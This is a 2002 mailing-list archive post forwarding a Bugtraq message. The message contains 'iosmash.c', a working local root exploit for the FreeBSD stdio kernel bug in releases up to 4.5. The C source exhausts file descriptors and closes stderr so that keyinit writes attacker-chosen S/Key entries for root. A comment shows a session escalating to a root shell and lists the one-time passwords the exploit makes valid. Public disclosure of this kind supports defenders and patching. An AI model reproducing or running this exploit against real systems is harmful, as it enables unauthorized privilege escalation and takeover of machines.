[luau] FreeBSD Local Root exploit... it works ;)
cpaul at telemetrybox.org
cpaul at telemetrybox.org
Tue Apr 23 11:01:17 PDT 2002
----- Forwarded message from Joshua Thayer <joshua at craigslist.org> -----
Delivered-To: epsas at localhost.pdchawaii.com
Envelope-to: cpaul at telemetrybox.org
Date: Tue, 23 Apr 2002 10:57:16 -0700 (PDT)
From: Joshua Thayer <joshua at craigslist.org>
To: <cpaul at telemetrybox.org>
Subject: cheers (fwd)
X-Return-Path: joshua at craigslist.org
---------- Forwarded message ----------
Date: Tue, 23 Apr 2002 10:42:49 -0700 (PDT)
From: Eric Scheide <scheide at craigslist.org>
To: Joshua Thayer <joshua at craigslist.org>
Subject: cheers (fwd)
--
Eric Scheide, scheide at craigslist.org
Chief Technology Officer
---------- Forwarded message ----------
Date: Mon, 22 Apr 2002 23:24:08 -0700
From: KF <dotslash at snosoft.com>
To: bugtraq <bugtraq at securityfocus.org>, vuln-dev
<vuln-dev at security-focus.com>
Subject: cheers
http://www.phased.home.ro/iosmash.c
-KF
/*
phased/b10z
phased at snosoft.com
23/04/2002
stdio kernel bug in All releases of FreeBSD up to and including 4.5-RELEASE
decided to make a trivial exploit to easily get root :)
> id
uid=1003(phased) gid=999(phased) groups=999(phased)
> ./iosmash
Adding phased:
<--- HIT CTRL-C --->
> su
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
xes#
this program makes the following skeys valid
95: CARE LIVE CARD LOFT CHIC HILL
96: TESS OIL WELD DUD MUTE KIT
97: DADE BED DRY JAW GRAB NOV
98: MASS OAT ROLL TOOL AGO CAM
99: DARK LEW JOLT JIVE MOS WHO
http://www.snosoft.com
cheers Joost Pol
*/
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
while(dup(1) != -1);
close(2);
execl("/usr/bin/keyinit",
"\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n");
}
----- End forwarded message -----
More information about the LUAU
mailing list